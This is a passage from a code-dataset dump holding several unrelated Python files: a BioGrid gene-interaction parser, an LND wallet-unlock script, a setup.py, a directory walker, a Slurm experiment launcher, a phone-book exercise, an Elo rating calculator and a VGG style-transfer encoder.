ids.\")\n else:\n self.test_ids = config.get_config()['test_ids']['gene']\n\n # data-source specific warnings\n # (will be removed when issues are cleared)\n logger.warning(\n \"several MI experimental codes do not exactly map to ECO; \"\n \"using approximations.\")\n return\n\n def fetch(self, is_dl_forced=False):\n \"\"\"\n\n :param is_dl_forced:\n :return: None\n \"\"\"\n\n self.get_files(is_dl_forced)\n\n # the version number is encoded in the filename in the zip.\n # for example, the interactions file may unzip to\n # BIOGRID-ALL-3.2.119.mitab.txt, where the version number is 3.2.119\n f = '/'.join((self.rawdir, self.files['interactions']['file']))\n st = os.stat(f)\n filedate = datetime.utcfromtimestamp(st[ST_CTIME]).strftime(\"%Y-%m-%d\")\n with ZipFile(f, 'r') as myzip:\n flist = myzip.namelist()\n # assume that the first entry is the item\n fname = flist[0]\n # get the version from the filename\n version = \\\n re.match(r'BIOGRID-ALL-(\\d+\\.\\d+\\.\\d+)\\.mitab.txt', fname)\n myzip.close()\n\n self.dataset.setVersion(filedate, str(version.groups()[0]))\n\n return\n\n def parse(self, limit=None):\n \"\"\"\n\n :param limit:\n :return:\n\n \"\"\"\n if self.testOnly:\n self.testMode = True\n\n self._get_interactions(limit)\n self._get_identifiers(limit)\n\n logger.info(\"Loaded %d test graph nodes\", len(self.testgraph))\n logger.info(\"Loaded %d full graph nodes\", len(self.graph))\n\n return\n\n def _get_interactions(self, limit):\n logger.info(\"getting interactions\")\n line_counter = 0\n f = '/'.join((self.rawdir, self.files['interactions']['file']))\n myzip = ZipFile(f, 'r')\n # assume that the first entry is the item\n fname = myzip.namelist()[0]\n matchcounter = 0\n\n with myzip.open(fname, 'r') as csvfile:\n for line in csvfile:\n # skip comment lines\n if re.match(r'^#', line.decode()):\n logger.debug(\"Skipping header line\")\n continue\n line_counter += 1\n line = line.decode().strip()\n # print(line)\n (interactor_a, interactor_b, alt_ids_a, alt_ids_b, aliases_a,\n aliases_b, detection_method, pub_author, pub_id, taxid_a,\n taxid_b, interaction_type, source_db, interaction_id,\n confidence_val) = line.split('\\t')\n\n # get the actual gene ids,\n # typically formated like: gene/locuslink:351|BIOGRID:106848\n gene_a_num = re.search(\n r'locuslink\\:(\\d+)\\|?', interactor_a).groups()[0]\n gene_b_num = re.search(\n r'locuslink\\:(\\d+)\\|?', interactor_b).groups()[0]\n\n if self.testMode:\n g = self.testgraph\n # skip any genes that don't match our test set\n if (int(gene_a_num) not in self.test_ids) or\\\n (int(gene_b_num) not in self.test_ids):\n continue\n else:\n g = self.graph\n # when not in test mode, filter by taxon\n if int(re.sub(r'taxid:', '', taxid_a.rstrip())) not in\\\n self.tax_ids or\\\n int(re.sub(\n r'taxid:', '', taxid_b.rstrip())) not in\\\n self.tax_ids:\n continue\n else:\n matchcounter += 1\n\n gene_a = 'NCBIGene:'+gene_a_num\n gene_b = 'NCBIGene:'+gene_b_num\n\n # get the interaction type\n # psi-mi:\"MI:0407\"(direct interaction)\n int_type = re.search(r'MI:\\d+', interaction_type).group()\n rel = self._map_MI_to_RO(int_type)\n\n # scrub pubmed-->PMID prefix\n pub_id = re.sub(r'pubmed', 'PMID', pub_id)\n # remove bogus whitespace\n pub_id = pub_id.strip()\n\n # get the method, and convert to evidence code\n det_code = re.search(r'MI:\\d+', detection_method).group()\n evidence = self._map_MI_to_ECO(det_code)\n\n # note that the interaction_id is some kind of internal biogrid\n # identifier that does not map to a public URI.\n # we will construct a 
monarch identifier from this\n\n assoc = InteractionAssoc(g, self.name, gene_a, gene_b, rel)\n assoc.add_evidence(evidence)\n assoc.add_source(pub_id)\n assoc.add_association_to_graph()\n\n if not self.testMode and (\n limit is not None and line_counter > limit):\n break\n\n myzip.close()\n\n return\n\n def _get_identifiers(self, limit):\n \"\"\"\n This will process the id mapping file provided by Biogrid.\n The file has a very large header, which we scan past,\n then pull the identifiers, and make equivalence axioms\n\n :param limit:\n :return:\n\n \"\"\"\n\n logger.info(\"getting identifier mapping\")\n line_counter = 0\n f = '/'.join((self.rawdir, self.files['identifiers']['file']))\n myzip = ZipFile(f, 'r')\n # assume that the first entry is the item\n fname = myzip.namelist()[0]\n foundheader = False\n\n # TODO align this species filter with the one above\n # speciesfilters = 'Homo sapiens,Mus musculus,Drosophila melanogaster,\n # Danio rerio, Caenorhabditis elegans,Xenopus laevis'.split(',')\n\n speciesfilters = 'Homo sapiens,Mus musculus'.split(',')\n with myzip.open(fname, 'r') as csvfile:\n for line in csvfile:\n # skip header lines\n if not foundheader:\n if re.match(r'BIOGRID_ID', line.decode()):\n foundheader = True\n continue\n\n line = line.decode().strip()\n # BIOGRID_ID\n # IDENTIFIER_VALUE\n # IDENTIFIER_TYPE\n # ORGANISM_OFFICIAL_NAME\n # 1\t814566\tENTREZ_GENE\tArabidopsis thaliana\n (biogrid_num, id_num, id_type,\n organism_label) = line.split('\\t')\n\n if self.testMode:\n g = self.testgraph\n # skip any genes that don't match our test set\n if int(biogrid_num) not in self.biogrid_ids:\n continue\n else:\n g = self.graph\n\n model = Model(g)\n\n # for each one of these,\n # create the node and add equivalent classes\n biogrid_id = 'BIOGRID:'+biogrid_num\n prefix = self._map_idtype_to_prefix(id_type)\n\n # TODO make these filters available as commandline options\n # geneidtypefilters='NCBIGene,OMIM,MGI,FlyBase,ZFIN,MGI,HGNC,\n # WormBase,XenBase,ENSEMBL,miRBase'.split(',')\n geneidtypefilters = 'NCBIGene,MGI,ENSEMBL,ZFIN,HGNC'.split(',')\n # proteinidtypefilters='HPRD,Swiss-Prot,NCBIProtein'\n if (speciesfilters is not None) \\\n and (organism_label.strip() in speciesfilters):\n line_counter += 1\n if (geneidtypefilters is not None) \\\n and (prefix in geneidtypefilters):\n mapped_id = ':'.join((prefix, id_num))\n model.addEquivalentClass(biogrid_id, mapped_id)\n # this symbol will only get attached to the biogrid class\n elif id_type == 'OFFICIAL_SYMBOL':\n model.addClassToGraph(biogrid_id, id_num)\n # elif (id_type == 'SYNONYM'):\n # FIXME - i am not sure these are synonyms, altids?\n # gu.addSynonym(g,biogrid_id,id_num)\n\n if not self.testMode and limit is not None \\\n and line_counter > limit:\n break\n\n myzip.close()\n\n return\n\n @staticmethod\n def _map_MI_to_RO(mi_id):\n rel = InteractionAssoc.interaction_object_properties\n mi_ro_map = {\n # colocalization\n 'MI:0403': rel['colocalizes_with'],\n # direct interaction\n 'MI:0407': rel['interacts_with'],\n # synthetic genetic interaction defined by inequality\n 'MI:0794': rel['genetically_interacts_with'],\n # suppressive genetic interaction defined by inequality\n 'MI:0796': rel['genetically_interacts_with'],\n # additive genetic interaction defined by inequality\n 'MI:0799': rel['genetically_interacts_with'],\n # association\n 'MI:0914': rel['interacts_with'],\n # physical association\n 'MI:0915': rel['interacts_with']\n }\n\n ro_id = rel['interacts_with'] # default\n if mi_id in mi_ro_map:\n ro_id = 
mi_ro_map.get(mi_id)\n\n return ro_id\n\n @staticmethod\n def _map_MI_to_ECO(mi_id):\n eco_id = 'ECO:0000006' # default to experimental evidence\n mi_to_eco_map = {\n 'MI:0018': 'ECO:0000068', # yeast two-hybrid\n 'MI:0004': 'ECO:0000079', # affinity chromatography\n 'MI:0047': 'ECO:0000076', # far western blotting\n 'MI:0055': 'ECO:0000021', # should be FRET, but using physical_interaction FIXME\n 'MI:0090': 'ECO:0000012', # desired: protein complementation, using: functional complementation\n 'MI:0096': 'ECO:0000085', # desired: pull down, using: immunoprecipitation\n 'MI:0114': 'ECO:0000324', # desired: x-ray crystallography, using: imaging assay\n 'MI:0254': 'ECO:0000011', # desired: genetic interference, using: genetic interaction evidence\n 'MI:0401': 'ECO:0000172', # desired: biochemical, using: biochemical trait evidence\n 'MI:0415': 'ECO:0000005', # desired: enzymatic study, using: enzyme assay evidence\n 'MI:0428': 'ECO:0000324', # imaging\n 'MI:0686': 'ECO:0000006', # desired: unspecified, using: experimental evidence\n 'MI:1313': 'ECO:0000006' # None?\n }\n if mi_id in mi_to_eco_map:\n eco_id = mi_to_eco_map.get(mi_id)\n else:\n logger.warning(\n \"unmapped code %s. Defaulting to experimental_evidence\", mi_id)\n\n return eco_id\n\n @staticmethod\n def _map_idtype_to_prefix(idtype):\n \"\"\"\n Here we need to reformat the BioGrid source prefixes\n to standard ones used in our curie-map.\n :param idtype:\n :return:\n\n \"\"\"\n prefix = idtype\n idtype_to_prefix_map = {\n 'XENBASE': 'XenBase',\n 'TREMBL': 'TrEMBL',\n 'MGI': 'MGI',\n 'REFSEQ_DNA_ACCESSION': 'RefSeqNA',\n 'MAIZEGDB': 'MaizeGDB',\n 'BEEBASE': 'BeeBase',\n 'ENSEMBL': 'ENSEMBL',\n 'TAIR': 'TAIR',\n 'GENBANK_DNA_GI': 'NCBIgi',\n 'CGNC': 'CGNC',\n 'RGD': 'RGD',\n 'GENBANK_GENOMIC_DNA_GI': 'NCBIgi',\n 'SWISSPROT': 'Swiss-Prot',\n 'MIM': 'OMIM',\n 'FLYBASE': 'FlyBase',\n 'VEGA': 'VEGA',\n 'ANIMALQTLDB': 'AQTLDB',\n 'ENTREZ_GENE_ETG': 'ETG',\n 'HPRD': 'HPRD',\n 'APHIDBASE': 'APHIDBASE',\n 'GENBANK_PROTEIN_ACCESSION': 'NCBIProtein',\n 'ENTREZ_GENE': 'NCBIGene',\n 'SGD': 'SGD',\n 'GENBANK_GENOMIC_DNA_ACCESSION': 'NCBIGenome',\n 'BGD': 'BGD',\n 'WORMBASE': 'WormBase',\n 'ZFIN': 'ZFIN',\n 'DICTYBASE': 'dictyBase',\n 'ECOGENE': 'ECOGENE',\n 'BIOGRID': 'BIOGRID',\n 'GENBANK_DNA_ACCESSION': 'NCBILocus',\n 'VECTORBASE': 'VectorBase',\n 'MIRBASE': 'miRBase',\n 'IMGT/GENE-DB': 'IGMT',\n 'HGNC': 'HGNC',\n 'SYSTEMATIC_NAME': None,\n 'OFFICIAL_SYMBOL': None,\n 'REFSEQ_GENOMIC_DNA_ACCESSION': 'NCBILocus',\n 'GENBANK_PROTEIN_GI': 'NCBIgi',\n 'REFSEQ_PROTEIN_ACCESSION': 'RefSeqProt',\n 'SYNONYM': None,\n 'GRID_LEGACY': None,\n # the following showed up in 3.3.124\n 'UNIPROT-ACCESSION': 'UniprotKB',\n 'SWISS-PROT': 'Swiss-Prot',\n 'OFFICIAL SYMBOL': None,\n 'ENSEMBL RNA': None,\n 'GRID LEGACY': None,\n 'ENSEMBL PROTEIN': None,\n 'REFSEQ-RNA-GI': None,\n 'REFSEQ-RNA-ACCESSION': None,\n 'REFSEQ-PROTEIN-GI': None,\n 'REFSEQ-PROTEIN-ACCESSION-VERSIONED': None,\n 'REFSEQ-PROTEIN-ACCESSION': None,\n 'REFSEQ-LEGACY': None,\n 'SYSTEMATIC NAME': None,\n 'ORDERED LOCUS': None,\n 'UNIPROT-ISOFORM': 'UniprotKB',\n 'ENSEMBL GENE': 'ENSEMBL',\n 'CGD': None, # Not sure what this is?\n 'WORMBASE-OLD': 'WormBase'\n\n }\n if idtype in idtype_to_prefix_map:\n prefix = idtype_to_prefix_map.get(idtype)\n else:\n logger.warning(\"unmapped prefix %s\", prefix)\n\n return prefix\n\n def getTestSuite(self):\n import unittest\n from tests.test_biogrid import BioGridTestCase\n # TODO add InteractionAssoc tests\n # TODO add test about if all prefixes are mapped?\n\n 
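# illustrative usage (an assumption, not from the source): the suite returned below\n # can be run directly with unittest.TextTestRunner(verbosity=2).run(suite)\n 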
test_suite = \\\n unittest.TestLoader().loadTestsFromTestCase(BioGridTestCase)\n\n return test_suite\n","sub_path":"dipper/sources/BioGrid.py","file_name":"BioGrid.py","file_ext":"py","file_size_in_byte":15927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"63853004","text":"# parameter #1: password c to unlock wallet\nimport base64\nimport codecs\nimport json\nimport requests\nimport sys\n\npw = sys.argv[1]\n\nurl = 'https://localhost:8080/v1/unlockwallet'\ncert_path = '/mnt/hdd/lnd/tls.cert'\n\ntry:\n pw_b64 = base64.b64encode(pw).decode()\nexcept TypeError: # for Python3+\n pw_b64 = base64.b64encode(pw.encode()).decode('UTF-8')\n\ndata = {'wallet_password': pw_b64}\ntry:\n r = requests.post(url, verify=cert_path, data=json.dumps(data))\nexcept requests.exceptions.ConnectionError as err:\n print(err)\n print(\"\\nAn Error occurred - is LND running?\")\n sys.exit(1)\n\nif r.status_code == 404:\n print(\"Already unlocked!\")\nelse:\n print(r.json())\n","sub_path":"home.admin/config.scripts/lnd.unlock.py","file_name":"lnd.unlock.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"209809665","text":"# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\n\ntry:\n from pypandoc import convert\n description = convert(\"README.md\", 'rst')\nexcept ImportError:\n description = open('README.md', 'r').read()\n\n\n# with open('README.rst') as f:\n# readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\nsetup(\n name='zdir',\n version=\"0.0.6\",\n description='Library for handling many small files. Packs files into directory, naming by hash of content. ',\n long_description=description,\n author='oskarnyqvist',\n author_email='oskarnyqvist@gmail.com',\n url='https://github.com/oskarnyqvist/zdir',\n license=license,\n py_modules=['zdir'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"361313183","text":"import glob\r\nimport os.path\r\n\r\ndir_count = file_count = 0\r\n\r\ndef traverse(dir, depth):\r\n global dir_count, file_count\r\n for obj in glob.glob(dir + \"/*\"):\r\n if depth==0:\r\n prefix = \"|--\"\r\n else:\r\n prefix = \"| \" * depth + \"|--\"\r\n if os.path.isdir(obj): # if it is a directory\r\n dir_count += 1\r\n print(prefix + os.path.basename(obj))\r\n traverse(obj, depth+1)\r\n elif os.path.isfile(obj): # if it is a file\r\n file_count += 1\r\n print(prefix + os.path.basename(obj))\r\n else:\r\n print(prefix + 'unknown object : ', obj)\r\n\r\nif __name__ == '__main__':\r\n traverse('../..',0)\r\n print('\\n',dir_count,'directories',file_count,'files')\r\n","sub_path":"Hello/BeautifulSoupEx/File/glob_ex02.py","file_name":"glob_ex02.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"633007972","text":"import os\nimport sys\nimport itertools\n\ndry_run = '--dry-run' in sys.argv\nclear = '--clear' in sys.argv\n\nif not os.path.exists(\"slurm_logs\"):\n os.makedirs(\"slurm_logs\")\nif not os.path.exists(\"slurm_scripts\"):\n os.makedirs(\"slurm_scripts\")\ncode_dir = '/private/home/willwhitney/code'\n\n# basename = \"SPMish\"\n# grids = [\n# # raw\n# {\n# \"main_file\": ['main'],\n# \"env_name\": [\n# 'SparsishPointMass-v0',\n# ],\n\n# \"start_timesteps\": [0],\n# 
\"max_timesteps\": [1e6],\n# \"eval_freq\": [1e3],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(8)),\n# },\n\n# # learned embedding\n# {\n# \"main_file\": ['main_embedded'],\n# \"env_name\": [\n# 'SparsishPointMass-v0',\n# ],\n# \"decoder\": [\n# # \"qvel_marg\",\n# # \"qvel_margscale\",\n# \"qpos_marg2\",\n# \"qpos_margscale2\",\n# ],\n\n# \"start_timesteps\": [0],\n# \"max_timesteps\": [1e6],\n# \"eval_freq\": [1e3],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(4)),\n# },\n# ]\n\n# basename = \"SPMAgain_noise\"\n# grids = [\n# # raw\n# # {\n# # \"main_file\": ['main'],\n# # \"env_name\": [\n# # 'SparsePointMass-v0',\n# # ],\n\n# # \"start_timesteps\": [0],\n# # \"max_timesteps\": [1e6],\n# # \"eval_freq\": [1e3],\n# # \"render_freq\": [1e10],\n# # \"seed\": list(range(8)),\n# # },\n\n# # learned embedding\n# {\n# \"main_file\": ['main_embedded'],\n# \"env_name\": [\n# 'SparsePointMass-v0',\n# ],\n# \"decoder\": [\n# # \"qvel_marg\",\n# # \"qvel_margscale\",\n# \"qpos_marg2\",\n# \"qpos_margscale2\",\n# ],\n\n# \"policy_noise\": [0.05, 0.1, 0.2],\n\n# \"start_timesteps\": [0],\n# \"max_timesteps\": [1e6],\n# \"eval_freq\": [1e2],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(6)),\n# },\n# ]\n\n# basename = \"dm.easy_lownoise\"\n# grids = [\n# # raw\n# {\n# \"main_file\": ['main'],\n# \"policy_name\": ['TD3'],\n# \"env_name\": [\n# 'dm.manipulator.reach',\n# 'dm.manipulator.chase',\n# ],\n\n# \"expl_noise\": [0.05],\n# \"policy_noise\": [0.1],\n# \"start_timesteps\": [0],\n# \"eval_freq\": [1e4],\n# \"render_freq\": [2e4],\n# \"max_timesteps\": [1e8],\n# \"seed\": list(range(8)),\n# },\n\n# # learned embedding\n# {\n# \"main_file\": ['main_embedded'],\n# \"env_name\": [\n# 'dm.manipulator.reach',\n# 'dm.manipulator.chase',\n# ],\n# \"decoder\": [\n# \"raw_prior_traj4_z5_norm1e4\",\n# \"raw_prior_traj8_z5_norm1e4\",\n# \"raw_prior_traj16_z5_norm1e4\",\n# ],\n\n# \"expl_noise\": [0.05],\n# \"policy_noise\": [0.1],\n# \"start_timesteps\": [0],\n# \"eval_freq\": [1e4],\n# \"render_freq\": [2e4],\n\n# \"max_timesteps\": [1e8],\n# \"seed\": list(range(8)),\n# },\n# ]\n\n# basename = \"Thrower_Striker_transfer_start\"\n# grids = [\n# # raw\n# {\n# \"main_file\": ['main'],\n# \"env_name\": [\n# 'Striker-v2',\n# 'Thrower-v2',\n# ],\n\n# \"max_timesteps\": [1e7],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(8)),\n# },\n\n# # learned embedding\n# {\n# \"main_file\": ['main_embedded'],\n# \"env_name\": [\n# 'Striker-v2',\n# 'Thrower-v2',\n# ],\n# \"decoder\": [\n# \"prior_traj4_z7_kl1e4_lr1e4_norm1e4\",\n# \"marginal_traj4_z7_kl1e4_lr1e4_norm1e4\",\n# ],\n\n# \"max_timesteps\": [1e7],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(8)),\n# },\n# ]\n\n# basename = \"RFS_nostart_redo_pnoise_scale\"\n# grids = [\n# # raw\n# # {\n# # \"main_file\": ['main'],\n# # \"env_name\": [\n# # 'ReacherVerticalSparse-v2',\n# # 'ReacherPushSparse-v2',\n# # 'ReacherSpinSparse-v2',\n# # ],\n\n# # \"start_timesteps\": [0],\n# # \"max_timesteps\": [1e6],\n# # \"render_freq\": [1e10],\n# # \"seed\": list(range(8)),\n# # },\n\n# # learned embedding\n# {\n# \"main_file\": ['main_embedded'],\n# \"env_name\": [\n# 'ReacherVerticalSparse-v2',\n# 'ReacherPushSparse-v2',\n# 'ReacherSpinSparse-v2',\n# ],\n# \"decoder\": [\n# \"qpos_marg_whitemax\",\n# \"qpos_margscale_whitemax\",\n# ],\n\n# \"start_timesteps\": [0],\n# \"max_timesteps\": [1e6],\n# \"render_freq\": [1e10],\n# \"seed\": list(range(8)),\n# },\n# ]\n\n\nbasename = \"RVS_qvel_white_traj8_z4\"\ngrids = [\n # raw\n # {\n # \"main_file\": 
['main'],\n # \"env_name\": [\n # 'ReacherVerticalSparse-v2',\n # 'ReacherPushSparse-v2',\n # 'ReacherSpinSparse-v2',\n # ],\n\n # \"start_timesteps\": [0],\n # \"max_timesteps\": [1e6],\n # \"render_freq\": [1e10],\n # \"seed\": list(range(8)),\n # },\n\n # learned embedding\n {\n \"main_file\": ['main_embedded'],\n \"env_name\": [\n 'ReacherVerticalSparse-v2',\n ],\n \"decoder\": [\n # \"qvel_white\",\n # \"qvel_white_z3\",\n # \"qvel_white_z4\",\n \"qvel_white_traj8_z4\",\n ],\n\n \"start_timesteps\": [0],\n \"max_timesteps\": [1e6],\n \"eval_freq\": [1e3],\n \"render_freq\": [5e3],\n \"seed\": list(range(4)),\n },\n]\n\n\njobs = []\nfor grid in grids:\n individual_options = [[{key: value} for value in values]\n for key, values in grid.items()]\n product_options = list(itertools.product(*individual_options))\n jobs += [{k: v for d in option_set for k, v in d.items()}\n for option_set in product_options]\n\nif dry_run:\n print(\"NOT starting {} jobs:\".format(len(jobs)))\nelse:\n print(\"Starting {} jobs:\".format(len(jobs)))\n\nall_keys = set().union(*[g.keys() for g in grids])\nmerged = {k: set() for k in all_keys}\nfor grid in grids:\n for key in all_keys:\n grid_key_value = grid[key] if key in grid else [\"<>\"]\n merged[key] = merged[key].union(grid_key_value)\nvarying_keys = {key for key in merged if len(merged[key]) > 1}\n\nexcluded_flags = {'main_file'}\n\nfor job in jobs:\n jobname = basename\n flagstring = \"\"\n for flag in job:\n\n # construct the string of arguments to be passed to the script\n if not flag in excluded_flags:\n if isinstance(job[flag], bool):\n if job[flag]:\n flagstring = flagstring + \" --\" + flag\n else:\n print(\"WARNING: Excluding 'False' flag \" + flag)\n else:\n flagstring = flagstring + \" --\" + flag + \" \" + str(job[flag])\n\n # construct the job's name\n if flag in varying_keys:\n jobname = jobname + \"_\" + flag + str(job[flag])\n flagstring = flagstring + \" --name \" + jobname\n\n slurm_script_path = 'slurm_scripts/' + jobname + '.slurm'\n slurm_script_dir = os.path.dirname(slurm_script_path)\n os.makedirs(slurm_script_dir, exist_ok=True)\n\n slurm_log_dir = 'slurm_logs/' + jobname \n os.makedirs(os.path.dirname(slurm_log_dir), exist_ok=True)\n\n true_source_dir = code_dir + '/TD3' \n job_source_dir = code_dir + '/TD3-clones/' + jobname\n try:\n os.makedirs(job_source_dir)\n os.system('cp *.py ' + job_source_dir)\n except FileExistsError:\n # with the 'clear' flag, we're starting fresh\n # overwrite the code that's already here\n if clear:\n print(\"Overwriting existing files.\")\n os.system('cp *.py ' + job_source_dir)\n\n jobcommand = \"python {}/{}.py{}\".format(job_source_dir, job['main_file'], flagstring)\n\n job_start_command = \"sbatch \" + slurm_script_path\n # jobcommand += \" --restart-command '{}'\".format(job_start_command)\n\n print(jobcommand)\n with open(slurm_script_path, 'w') as slurmfile:\n slurmfile.write(\"#!/bin/bash\\n\")\n slurmfile.write(\"#SBATCH --job-name\" + \"=\" + jobname + \"\\n\")\n slurmfile.write(\"#SBATCH --open-mode=append\\n\")\n slurmfile.write(\"#SBATCH --output=slurm_logs/\" +\n jobname + \".out\\n\")\n slurmfile.write(\"#SBATCH --error=slurm_logs/\" + jobname + \".err\\n\")\n slurmfile.write(\"#SBATCH --export=ALL\\n\")\n slurmfile.write(\"#SBATCH --signal=USR1@600\\n\")\n # slurmfile.write(\"#SBATCH --time=0-06\\n\")\n slurmfile.write(\"#SBATCH --time=1-00\\n\")\n # slurmfile.write(\"#SBATCH -p dev\\n\")\n slurmfile.write(\"#SBATCH -p uninterrupted,dev\\n\")\n # slurmfile.write(\"#SBATCH -p 
uninterrupted\\n\")\n # slurmfile.write(\"#SBATCH -p priority\\n\")\n slurmfile.write(\"#SBATCH -N 1\\n\")\n slurmfile.write(\"#SBATCH --mem=32gb\\n\")\n\n slurmfile.write(\"#SBATCH -c 3\\n\")\n slurmfile.write(\"#SBATCH --gres=gpu:1\\n\")\n\n # slurmfile.write(\"#SBATCH -c 40\\n\")\n # slurmfile.write(\"#SBATCH --constraint=pascal\\n\")\n\n slurmfile.write(\"cd \" + true_source_dir + '\\n')\n slurmfile.write(\"srun \" + jobcommand)\n slurmfile.write(\"\\n\")\n\n if not dry_run:\n os.system(job_start_command + \" &\")\n","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":9394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"467901259","text":"# Accepted solution\nif __name__ == '__main__':\n n = int(input())\n phone_book = dict()\n output = []\n\n for i in range(n):\n key, value = input().split(\" \")\n phone_book[key] = value\n\n while True:\n try:\n search_word = input()\n if search_word in phone_book:\n output.append('{}={}'.format(search_word, phone_book[search_word]))\n else:\n output.append('Not found')\n except EOFError:\n break\n\n for search_word in output:\n print(search_word)\n\n# Runtime Error\n# if __name__ == '__main__':\n# n = int(input())\n# phone_book = dict()\n# search_items = list()\n#\n# for i in range(n):\n# key, value = input().split(\" \")\n# phone_book[key] = value\n#\n# for i in range(n):\n# search_word = input()\n# search_items.append(search_word)\n#\n# for search_word in search_items:\n# value = phone_book.get(search_word, '')\n# if value:\n# print(\"{}={}\".format(search_word, value))\n# else:\n# print(\"Not found\")\n\n\n# Runtime Error\n# Terminated due to timeout\n# Wrong Answer\n\n\n# if __name__ == '__main__':\n# n = int(input())\n# phone_book = list()\n# search_term = list()\n#\n#\n# def find_key_for(input, value):\n# for k, v in input:\n# if value in k or value == k:\n# return \"{}={}\".format(k, v)\n#\n# for i in range(n):\n# arr = tuple(input().split())\n# phone_book.append(arr)\n#\n# for i in range(n):\n# search_word = input()\n# search_term.append(search_word)\n#\n# for search_word in search_term:\n# result = find_key_for(phone_book, search_word)\n# if result:\n# print(result)\n# else:\n# print(\"Not found\")","sub_path":"day08_dictionaries_and_maps_hr.py","file_name":"day08_dictionaries_and_maps_hr.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"648513136","text":"# Rating update functions\r\ndef exp_score_a(rating_a, rating_b):\r\n\treturn 1.0 / (1 + 10**((rating_b - rating_a)/400.0))\r\n\r\ndef rating_adj(rating, exp_score, score, k):\r\n\treturn rating + k * (score - exp_score)\r\n\r\n\r\n# General GG class to keep track of ELO rating, games played, and number of wins. 
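(Worked example, illustrative and not from the source: for two 1500-rated players exp_score_a returns 0.5, so a win at k = 40 moves the winner up by 40*(1 - 0.5) = 20 points to 1520.) 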
Default rating is 1500\r\n# id & trueid are strings not ints\r\nclass GuiltyPlayer(object):\r\n\tdef __init__(self, id, trueid, name='', rating=1500.0, games=0, wins=0):\r\n\t\r\n\t\tself.id = id\r\n\t\tself.trueid = trueid\r\n\t\tself.rating = rating\r\n\t\tself.name = name\r\n\t\tself.games = games\r\n\t\tself.wins = wins\r\n\t\t\r\n\t@property\r\n\tdef k(self):\r\n\t\tif self.games < 20:\r\n\t\t\treturn 40\r\n\t\telif self.rating < 2400:\r\n\t\t\treturn 20\r\n\t\telse:\r\n\t\t\treturn 10\r\n\t\t\r\n\tdef match(self, other, result):\r\n\r\n\t\texp_a = exp_score_a(self.rating, other.rating)\r\n\r\n\t\tif result == self.id:\r\n\t\t\tself.rating = rating_adj(self.rating, exp_a, 1, self.k)\r\n\t\t\tother.rating = rating_adj(other.rating, 1 - exp_a, 0, other.k)\r\n\t\t\tself.wins += 1\r\n\t\telif result == other.id:\r\n\t\t\tself.rating = rating_adj(self.rating, exp_a, 0, self.k)\r\n\t\t\tother.rating = rating_adj(other.rating, 1 - exp_a, 1, other.k)\r\n\t\t\tother.wins += 1\r\n\t\t\t\r\n\t\tself.games += 1\r\n\t\tother.games += 1\r\n\t\t\r\n# Input results here\r\n# leave first 2 fields unchanged and the rest are: Player name, ELO, Total number of games, Total number of wins\r\n# You don't really have to change the name or wins, the calculations only take into account ELO and games played\r\n# But it helps with keeping track of things. (maybe make sure there's not more wins than games, that might break it idk)\r\n# vvv\r\n\r\nwinner = GuiltyPlayer(str(\"00001\"), \"00001\", \"Player 1\", 1661.611412, 26 , 26)\r\nloser = GuiltyPlayer(str(\"00002\"), \"00002\", \"Player 2\", 1641.802755, 5 , 2)\r\n\r\n# ^^^\r\n#\r\n#\r\n#\r\n\r\n\r\n\r\nwinner.match(loser, \"00001\")\r\nprint(winner.name, \" - \" + str(winner.rating), \" - \" + str(winner.games), \" - \" + str(winner.wins))\r\nprint(loser.name, \" - \" + str(loser.rating), \" - \" + str(loser.games), \" - \" + str(loser.wins))\r\n","sub_path":"SNP.py","file_name":"SNP.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"631078765","text":"import torch\nimport torch.nn as nn\nfrom torchvision import models\n\n\nclass Encoder(nn.Module):\n def __init__(self, weight_path=None, pretrained=True):\n super(Encoder, self).__init__()\n if weight_path:\n vgg = models.vgg19()\n vgg.load_state_dict(torch.load(weight_path))\n\n elif pretrained:\n vgg = models.vgg19(pretrained=True)\n\n else:\n raise OSError(\"VGG Model initialization error!\")\n\n features = vgg.features\n\n self.enc_1 = features[0:2]\n self.enc_2 = features[2:7]\n self.enc_3 = features[7:12]\n self.enc_4 = features[12:21]\n self.name = [\"enc_1\", \"enc_2\", \"enc_3\", \"enc_4\"]\n\n def fix_param(self):\n for name in self.name:\n for param in getattr(self, name).parameters():\n param.requires_grad = False\n\n def forward(self, input_tensor):\n feature_1 = self.enc_1(input_tensor)\n feature_2 = self.enc_2(feature_1)\n feature_3 = self.enc_3(feature_2)\n feature_4 = self.enc_4(feature_3)\n return feature_1, feature_2, feature_3, feature_4\n\n\ndecoder = nn.Sequential(\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(512, 256, (3, 3)),\n nn.ReLU(),\n nn.Upsample(scale_factor=2, mode='nearest'),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(256, 256, (3, 3)),\n nn.ReLU(),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(256, 256, (3, 3)),\n nn.ReLU(),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(256, 256, (3, 3)),\n nn.ReLU(),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(256, 128, (3, 
